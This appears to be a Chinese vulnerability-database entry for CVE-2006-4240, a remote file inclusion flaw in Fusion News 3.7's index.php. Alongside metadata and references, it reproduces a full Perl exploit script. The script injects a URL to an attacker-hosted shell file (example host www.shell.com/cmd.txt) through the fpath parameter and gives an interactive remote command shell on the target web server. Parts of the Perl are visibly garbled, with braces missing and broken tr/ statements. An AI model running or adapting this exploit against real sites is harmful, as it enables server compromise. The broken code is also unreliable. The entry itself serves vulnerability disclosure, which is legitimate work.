FusionPHP Fusion News 'Index.PHP'远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110830 漏洞类型 输入验证
发布时间 2006-08-16 更新时间 2007-02-13
CVE编号 CVE-2006-4240 CNNVD-ID CNNVD-200608-331
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/28394
https://www.securityfocus.com/bid/19546
https://cxsecurity.com/issue/WLB-2006080129
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-331
|漏洞详情
FusionNews3.7的index.php脚本存在PHP远程文件包含漏洞,远程攻击者可借助fpath参数中的URL执行任意PHP代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/19546/info

Fusion News is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and to access the underlying system.

#!/usr/bin/perl

	###########################################################################################

	#			Aria-Security.net Advisory                                   															     #

	#			Discovered  by: OUTLAW                                    														               #

	#			< www.Aria-security.net >                               														              #

	#		Gr33t to: A.u.r.a  & HessamX & Cl0wn & DrtRp													                       	  #

	#		  Special Thanx To All Aria-Security Users      			  													 #

	###########################################################################################


use LWP::UserAgent;

print "\n === Fusion News v3.7 Remote File Inclusion\n";

print "\n === Discovered by OutLaw .\n";

print "\n  === www.Aria-Security.Net\n";


$bPath = $ARGV[0];

$cmdo = $ARGV[1];

$bcmd = $ARGV[2];


if($bPath!~/http:\/\// || $cmdo!~/http:\/\// || !$bcmd){usage()}




while()

 

       print "[Shell] \$";

while(<STDIN>)

       {

               $cmd=$_;

               chomp($cmd);


$xpl = LWP::UserAgent->new() or die;

$req = HTTP::Request->new(GET =>$bpath.'index.php?fpath='.$cmdo.'?&'.$bcmd.'='.$cmd)or die "
\n Could not connect !\n";

$res = $xpl->request($req);

$return = $res->content;

$return =~ tr/[\n]/[ê;

if (!$cmd) {print "\nPlease type a Command\n\n"; $return ="";}

elsif ($return =~/failed to open stream: HTTP request failed!/)

       {print "\n Could Not Connect to cmd Host\n";exit}

elsif ($return =~/^<b>Fatal.error/) {print "\n Invalid Command\n"}

if($return =~ /(.*)/)

 

       $freturn = $1;

       $freturn=~ tr/[ê[\n]/;

       print "\r\n$freturn\n\r";

       last;

 


else {print "[Shell] \$";}}}last;


sub usage()

 {

print " Usage : fusion.pl [host] [cmd shell location] [cmd shell variable]\n";

print " Example : fusion.pl http://fusionnews.com http://www.shell.com/cmd.txt cmd\n";

 exit();

 }
|受影响的产品
Fusionphp Fusion News 3.7
|参考资料

来源:XF
名称:fusionnews-index-file-include(28400)
链接:http://xforce.iss.net/xforce/xfdb/28400
来源:BID
名称:19546
链接:http://www.securityfocus.com/bid/19546
来源:VUPEN
名称:ADV-2006-3298
链接:http://www.frsirt.com/english/advisories/2006/3298
来源:SECTRACK
名称:1016701
链接:http://securitytracker.com/id?1016701
来源:BUGTRAQ
名称:20060815fusionnews3,7RemoteFileInclusion
链接:http://archives.neohapsis.com/archives/bugtraq/2006-08/0317.html
来源:SREASON
名称:1420
链接:http://securityreason.com/securityalert/1420